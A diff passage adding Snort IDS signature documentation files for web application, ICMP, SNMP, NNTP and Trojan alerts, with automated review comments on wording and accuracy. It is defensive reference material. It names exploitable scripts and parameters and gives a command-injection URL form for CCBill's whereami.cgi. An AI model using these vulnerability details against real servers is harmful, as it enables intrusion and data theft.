+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS425
+
+--
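Review bot: Detailed Information gives the detection criteria ("an ICMP echo reply with an ICMP identification number of 0 and with a sequence of A's in the payload") but False Positives states "None Known." without saying why an ordinary echo reply cannot match; a sentence explaining that normal echo replies carry the request's non-zero id and echo the request payload rather than the base64 padding described here would support the claim. Wording: "communicate with each other for various reasons for the ultimate purpose of attacking a target" doubles "for"; "for the ultimate purpose" can go. Minor trailing whitespace after "network." in Impact, after "host." in Affected Systems and after "employed." in Detailed Information.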
--- /dev/null
+++ b/doc/signatures/1662.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+1662
+--
+Summary:
+This event is generated when an attempt is made to access the home directory of the ftp user via http.
+
+--
+Impact:
+Medium - Possible unauthorized file access due a configuration error
+
+--
+Detailed Information:
+The FTP server might block access on ftp homedir to (anonymous) users, 
+but the folder can be read using the webserver.
+
+Apache UserDir module allows sharing home directory (sub-)folders, a 
+misconfiguration of the webserver or ftp user account may allow 
+unauthorized access to the ftp user directory.
+
+--
+Attack Scenarios:
+A FTP server blocks access to the ftp users homedir. A misconfiguration might allow an attacker to access the ftp users home directory.
+
+This home folder might contain critical files.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Visit http://httpd.apache.org/docs for UserDir configuration options or 
+remove UserDir module if not needed.
+
+Configure the ftp user to use a non-interactive nologin shell that does 
+not require a home directory.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Ueli Kistler, <u.kistler@engagesecurity.com>
+
+-- 
+Additional References:
+
+
+--
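Review bot: Grammar in Impact: "due a configuration error" should be "due to a configuration error"; Attack Scenarios should read "An FTP server" and "the ftp user's home directory" (possessive) in both sentences. Detailed Information says the directory "can be read using the webserver" through the Apache UserDir module, so Corrective Action could name the directive that blocks it ("UserDir disabled ftp") alongside the docs link. Additional References is empty; the http://httpd.apache.org/docs URL given in Corrective Action belongs there. Minor: no blank line between "1662" and "--", a stray comma before the address in "Ueli Kistler, <u.kistler@engagesecurity.com>", trailing whitespace on "Rule:  " and on the "-- " separator, and several lines in Detailed Information and Corrective Action end in a trailing space.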
--- /dev/null
+++ b/doc/signatures/183.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+183
+
+--
+Summary:
+Q is a Trojan Horse offering the attacker remote access to the victim 
+host. This event is generated when raw ICMP packets are sent to the 
+victim server.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a
+compromise of all resources the machine is connected to.
+
+--
+Detailed Information:
+This Trojan affects UNIX operating systems.
+
+The Trojan is controlled by sending raw packets (TCP/UDP/ICMP) to the 
+victim host containing commands to be run as root.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. The 
+attacker can then choose to send raw data to the victim via TCP/UDP/ICMP
+from the broadcast address of a class C network.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Traffic originating from a broadcast address should not be allowed from 
+external sources or from internal sources to external destinations. 
+Judicious use of firewall rules is necessary.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS202
+
+--
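Review bot: Affected Systems is missing from this file; Detailed Information already states "This Trojan affects UNIX operating systems.", which is what that section would carry. Ease of Attack, "This is Trojan activity, the target machine may already be compromised.", is a comma splice and does not rate the ease; the other docs use "Simple." and the compromise remark belongs under Impact. Corrective Action only blocks traffic "originating from a broadcast address", yet Detailed Information says commands arrive as "raw packets (TCP/UDP/ICMP)"; the doc should make clear that the firewall rule removes the traffic this signature keys on (the broadcast-source variant in Attack Scenarios) and does not clean the host, so a hit still calls for host forensics.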
--- /dev/null
+++ b/doc/signatures/2425.txt
@@ -0,0 +1,61 @@
+Rule:  
+
+--
+Sid:
+2425
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in ISC INN Usenet/NNTP server.
+
+--
+Impact:
+Execution of arbitrary code is possible.
+
+--
+Detailed Information:
+A vulnerability exists in the network news transport protocol server
+from ISC. It may be possible for a remote attacker to exploit a buffer
+overflow condition in the software to execute code of the attackers
+choosing with the privileges of the user running the daemon.
+
+--
+Affected Systems:
+	ISC INN 2.4 .0
+
+--
+Attack Scenarios:
+An attacker may send specially crafted packets to a vulnerable system to
+cause the overflow condition to occur. Once successful the attacker may
+attempt to escalate privileges by using further local exploits.
+
+--
+Ease of Attack:
+Moderate.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
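Review bot: Affected Systems has a stray space in the version: "ISC INN 2.4 .0" should be "ISC INN 2.4.0". Detailed Information only says a buffer overflow exists "in the network news transport protocol server" without naming the affected command or component, and Additional References is empty; since sid 2425 matches a specific NNTP request, say what the rule matches on and cite the advisory. Minor: "Apply the appropriate vendor supplied patches" lacks a period, "attackers choosing" needs an apostrophe, and "Rule:  " and the "-- " separator carry trailing whitespace.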
--- /dev/null
+++ b/doc/signatures/100000545.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000545
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "PHP Blue Dragon CMS" application running on a 
+webserver. Access to the file "team_admin.php" using a remote file being passed 
+as the "DragonRootPath" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "DragonRootPath" parameter in the "team_admin.php" 
+script used by the "PHP Blue Dragon CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHP Blue Dragon CMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1432.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1432
+
+--
+Summary:
+This event is generated when activity by Peer-to-Peer (p2p) clients is detected.
+
+--
+Impact:
+Informational event. Unauthorized use of a p2p client may be in progress.
+
+--
+Detailed Information:
+This event indicates that use of a p2p client has been detected. This 
+may be against corporate policy. p2p clients connect to other p2p 
+clients to share files, commonly music and video files but can be 
+configured to share any file on the local machine.
+
+This activity may not only use bandwidth but may also be used to 
+transfer company confidential information to unauthorized hosts external
+to the protected network bypassing other security measures in place.
+
+This rule detects activity from Gnutella p2p client applications.
+
+--
+Affected Systems:
+	Any host using a Gnutella p2p client.
+
+--
+Attack Scenarios:
+This is indicative of the use of a p2p client.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Check the host and uninstall any p2p client found.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+GNUTella
+http://www.gnutella.com
+
+Gnutella Protocol
+http://rfc-gnutella.sourceforge.net/developer/testing/
+
+--
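Review bot: Summary and Impact speak of generic "Peer-to-Peer (p2p) clients", but Detailed Information ends with "This rule detects activity from Gnutella p2p client applications." and Affected Systems names Gnutella; Summary should say Gnutella so the alert is not read as covering every p2p protocol. Ease of Attack "Simple." and Attack Scenarios "This is indicative of the use of a p2p client." fit a policy rule poorly; stating which part of the Gnutella protocol exchange (linked under Additional References) the rule keys on would be more useful to an analyst. Minor: "company confidential information" should be hyphenated, and "GNUTella" in Additional References should match the "Gnutella" spelling used in the body.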
--- /dev/null
+++ b/doc/signatures/100000455.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000455
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "Axent Forum" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "startrow" parameter in the "viewposts.cfm" 
+script used by the "Axent Forum" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Axent Forum
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
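Review bot: As with the other XSS signature docs in this patch, the "startrow" parameter of "viewposts.cfm" is a cross site scripting flaw, yet Impact promises "Possible unauthorized administrative access to the server or application" and "execution of arbitrary code", and the second Detailed Information paragraph says the attacker may "execute system binaries"; trim both to the browser-side impact that Attack Scenarios describes. "attackers choosing" needs an apostrophe. The blank line before "--" is missing after "100000455", after the Affected Systems line and after the contributor line, and an extra blank line follows the final "--".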
--- /dev/null
+++ b/doc/signatures/100000836.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000836
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "MiniBB" application running on a webserver. Access to the file "com_minibb.php" using a remote file being passed as the "absolute_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "absolute_path" parameter in the "com_minibb.php" script used by the "MiniBB" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using MiniBB
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
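Review bot: The third Detailed Information paragraph and Attack Scenarios again describe credential abuse against a CGI login rather than the remote file include via "absolute_path" in "com_minibb.php"; remove the paragraph and reword Attack Scenarios. The file name "com_minibb.php" does not obviously belong to the MiniBB application itself; Summary should say which package ships that file so readers can check their installation. Typos: "ona" should be "on a", "attackers choosing" needs an apostrophe, and "an exploitation attempt has been attempted" is redundant. Two blank lines open the file, the blank line before "--" is missing after the Sid, Affected Systems and Contributors entries, and Additional References is empty.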
--- /dev/null
+++ b/doc/signatures/119-14.txt
@@ -0,0 +1,63 @@
+Rule: 
+
+--
+Sid: 
+119-14
+
+-- 
+Summary: 
+This event is generated when the pre-processor http_inspect
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the http_inspect pre-processor detects the
+use of non-standard RFC defined characters are used in a web request.
+
+The characters generating the events are user configured.
+
+--
+Affected Systems:
+	All web servers
+
+--
+Attack Scenarios: 
+An attacker may use non-standard characters in a request in an attempt
+to evade an IDS in the course of an attack against a web server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Daniel Roelker <droelker@sourcefire.com> 
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+HTTP IDS Evasions Revisited - Daniel Roelker
+http://docs.idsresearch.org/http_ids_evasions.pdf
+
+--
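Review bot: The Detailed Information sentence "This event is generated when the http_inspect pre-processor detects the use of non-standard RFC defined characters are used in a web request." is ungrammatical and ambiguous; it should say "detects characters in a web request that are not defined by the HTTP RFC", which is the evasion class covered by the paper under Additional References. Since "The characters generating the events are user configured.", the doc should name the http_inspect option that sets them so an analyst can check the sensor configuration. Impact "Unknown." could at least carry the evasion angle stated in Attack Scenarios. Minor: trailing whitespace on "Rule: ", "Sid: " and several "-- " separators, and an extra blank line after the separator before Corrective Action.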
--- /dev/null
+++ b/doc/signatures/100000716.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000716
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "PHPRaid" application running on a webserver. Access to the file "users.php" using a remote file being passed as the "phpraid_dir" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpraid_dir" parameter in the "users.php" script used by the "PHPRaid" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPRaid
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
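Review bot: As in the other remote-file-include docs in this patch, the third Detailed Information paragraph and Attack Scenarios describe CGI credential abuse rather than the include via "phpraid_dir" in "users.php"; drop the paragraph and make Attack Scenarios describe a crafted "phpraid_dir" value. Typos: "ona" should be "on a", "attackers choosing" needs an apostrophe, and "an exploitation attempt has been attempted" should be "an exploit has been attempted". Two blank lines open the file, no blank line precedes "--" after the Sid, Affected Systems and Contributors entries, and Additional References should cite the advisory instead of being empty.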
--- /dev/null
+++ b/doc/signatures/448.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+448
+
+--
+Summary:
+This event is generated when an ICMP "Source Quench" message is 
+generated that has a non-zero ICMP code.  
+
+--
+Impact:
+Informational.  This may indicate that the ICMP message has been 
+crafted.
+
+--
+Detailed Information:
+An ICMP "Source Quench" message is issued by a network device that 
+cannot handle the current volume of traffic.  The ICMP code value for 
+this message should be 0.  If a non-zero ICMP code is observed, it may 
+be an indication that the packet was crafted with an invalid value.
+
+ICMP Source Quench messages may be normally sent by either a gateway or 
+a host as a congestion control mechanism. A gateway would send them if 
+it is running out of buffer space (needed to queue datagrams for output 
+to the next hop) or by a host that is receiving datagrams too fast to 
+process. Maliciously crafted ICMP Source Quench Messages may be used to 
+force a remote host to slow down its transmission rate and causing a 
+Denial of Service.
+
+--
+Affected Systems:
+This traffic should have no adverse impact.
+
+--
+Attack Scenarios:
+An attacker may craft an ICMP "Source Quench" message with an invalid 
+ICMP code.  A single packet itself is not harmful, but the unusual ICMP 
+code my indicate that this packet was abnormally generated.
+
+--
+Ease of Attack:
+Simple. There are many packages available to generate ICMP messages.
+
+--
+False Positives:
+Although rare, it is possible to observe an ICMP "Source Quench" message
+with a non-zero type code generated by software that does not conform to standards.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+If a routing device in your network is generating this message, investigate why it does not have a standard ICMP code of 0.
+
+--
+Contributors:
+Original rule writer unknown.
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Additional information by Jose Hernandez <jrseal76@hotmail.com>
+
+--
+Additional References:
+
+--
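Review bot: False Positives says "with a non-zero type code", but the rule keys on the ICMP code field, not the type (Source Quench is type 4 with code 0); change to "non-zero ICMP code" to match Summary and Detailed Information. Typo in Attack Scenarios: "code my indicate" should be "may indicate". The last Detailed Information sentence, "force a remote host to slow down its transmission rate and causing a Denial of Service.", should read "and cause a denial of service". Affected Systems, "This traffic should have no adverse impact.", answers the wrong question; "Any host that honours ICMP Source Quench" would fit. Additional References is empty although the "should be 0" claim comes from RFC 792, which defines Source Quench; cite it. Minor: the False Positives second line and the Corrective Action line exceed the wrap width used elsewhere in the file.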
--- /dev/null
+++ b/doc/signatures/100000798.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000798
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Pivot" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "c3" parameter in the "blogroll.php" script used by the "Pivot" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Pivot
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000109.txt
@@ -0,0 +1,63 @@
+Rule: 
+
+--
+Sid: 
+100000109
+
+-- 
+Summary: 
+This event is generated when an SQL injection attempt is made against the 
+OpenBB web bulliten board system.
+
+-- 
+
+Impact: 
+Attackers may run arbitrary database commands with the privileges of the 
+affected script.
+
+--
+Detailed Information:
+This rule looks specifically for attacks against the member.php module of the 
+OpenBB program. Attackers must supply a variable whose value is numeric, 
+followed by a space, in order to exploit this vulnerability.
+
+--
+Affected Systems:
+OpenBB 1.0.5
+OpenBB 1.1.0
+
+--
+
+Attack Scenarios: 
+A web browser or a script may be used to exploit this vulnerability.
+
+-- 
+
+Ease of Attack: 
+Simple, as example attacks that can be used with a web browser are publicly 
+available.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Currently, no vendor-supplied patches are available. A descripton of an 
+unverified workaround is available in the Additional References section.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+http://www.securityfocus.com/archive/1/319714
+
+-- 
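Review bot: two spelling errors in this file: "bulliten board" in the Summary should be "bulletin board", and "descripton" in Corrective Action should be "description". The Detailed Information sentence "Attackers must supply a variable whose value is numeric, followed by a space" never names the member.php parameter the rule keys on, so an analyst cannot tell which request field to inspect; please name it. The Corrective Action statement "Currently, no vendor-supplied patches are available" is a snapshot from when the rule was written and should be re-verified before shipping in a 2013 package, or reworded to say when it was last checked. Several "Rule: ", "Sid: " and "-- " lines carry trailing whitespace, and blank lines follow some "--" separators but not others.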
--- /dev/null
+++ b/doc/signatures/850.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+850
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
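Review bot: this file never says what the rule actually matches: Summary, Detailed Information and Affected Systems are all generic ("a CGI web application", "All systems running CGI applications") and Additional References is empty, so an analyst triaging sid 850 learns nothing about which script or URI triggered it. Please name the target in the Summary and add at least one reference. Typos: "running ona web server" (missing space) and "attackers choosing" (apostrophe, twice). The line "relationships between the victim server and other hosts can be exploited by the attacker." also runs well past the wrap width used by the rest of the file.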
--- /dev/null
+++ b/doc/signatures/1893.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+1893
+
+--
+Summary:
+This event is generated when SNMP communications do not contain a 
+community name.
+
+--
+Impact:
+Medium to Serious. Depending on if the community string was for 
+read-only, read-create or read-write an attacker could gain a varying 
+level of access to a system.
+
+--
+Detailed Information:
+An SNMP community string is the authentication process that a host 
+running SNMP uses to grant access. By supplying a blank community string
+and attacker may be attempting to gain access to SNMP functionality for
+a device that has not been configured correctly.
+
+--
+Affected Systems:
+Numerous. Routers, switches, servers, NAS systems, many others.
+
+--
+Attack Scenarios:
+An attacker can launch a scan of all network attached devices looking 
+for port 161 (UDP) and then attempt to gain access using SNMP.
+
+--
+Ease of Attack:
+Simple. There are many free SNMP "tree walking" programs, an example of 
+such is getIF.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Ensure that all devices using SNMP have a community string assigned.
+
+Make sure that all devices that have SNMP turned on have complex 
+passwords assigned.
+
+Disable unneeded WRITE / CREATE community strings.
+
+Since SNMP traffic is not encrypted, use a packet filtering firewall to 
+restrict SNMP communications to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by  Mike Rivett ebiz@rivett.org
+
+-- 
+Additional References:
+
+GetIF:
+http://www.wtcs.org/snmp4tpc/getif.htm
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0517
+
+--
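Review bot: terminology drifts between "community name" (Summary), "community string" (Impact, Detailed Information) and "complex passwords" (Corrective Action); use "community string" throughout so that "Make sure that all devices that have SNMP turned on have complex passwords assigned" is unambiguous. Grammar: "and attacker may be attempting" should be "an attacker may be attempting", and "Depending on if" reads better as "Depending on whether". The Contributors line "Snort documentation contributed by  Mike Rivett ebiz@rivett.org" has a double space and is missing the angle brackets used for every other address. The CVE link still uses the old CAN- candidate prefix; MITRE has since renamed candidates to CVE- identifiers, so the link text and URL should be updated to the CVE form.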
--- /dev/null
+++ b/doc/signatures/2396.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+2396
+
+--
+Summary:
+This event is generated when an attacker attempts to execute an arbitrary command on a web server running the CCBill software. 
+
+--
+Impact:
+Execution of arbitrary commands.
+
+--
+Detailed Information:
+The CCBill software is available to manage credit card information for UNIX and Windows hosts.  The script whereami.cgi is used for technical support of the software.  A vulnerability exists in the whereami.cgi script that allows the execution of arbitrary commands from an attacker who passes a command via whereami.cgi?g=command format in a URL.  Supplied commands can list file names, show the contents of the password file, or install a backdoor to name a few actions that an attacker may attempt.
+
+--
+Affected Systems:
+Hosts running CCBill software that has the whereami.cgi in the server's CGI path.
+
+--
+Attack Scenarios:
+An attacker can send a request to execute an arbitrary command.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Remove the whereami.cgi command.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+bugtraq
+http://www.securityfocus.com/bid/8095
+
+--
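Review bot: Corrective Action says "Remove the whereami.cgi command", but whereami.cgi is described everywhere else in the file as a script, and Affected Systems ties exposure to its presence "in the server's CGI path"; suggest "Remove the whereami.cgi script from the CGI path, or restrict access to it" so the remedy matches the affected-system condition. Ease of Attack is just "Simple." with no statement on whether a public exploit exists, which every comparable file in this patch gives. Double spaces after sentences are inconsistent with the rest of the documentation set.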
--- /dev/null
+++ b/doc/signatures/2433.txt
@@ -0,0 +1,79 @@
+Rule:
+
+--
+Sid:
+2433
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Possible unauthorized administrative access to the server or application.
+Possible execution of arbitrary code of the attackers choosing.
+
+--
+Detailed Information:
+MDaemon is mail server software for Microsoft Windows systems. It uses a
+CGI web interface to send email. The email form used to submit the
+message does not properly check user supplied input. This may result in
+an attacker being able to supply a "From" field larger than 249 bytes
+which may in turn cause an error condition to occur in the executable
+file handling the form input. This error may present the attacker with
+the opportunity to gain administrative access to the server and also
+execute code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running on a web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	Alt-N MDaemon 6.5.2
+	Alt-N MDaemon 6.7.5, 6.7.9
+	Alt-N MDaemon 6.8.0 through 6.8.5
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
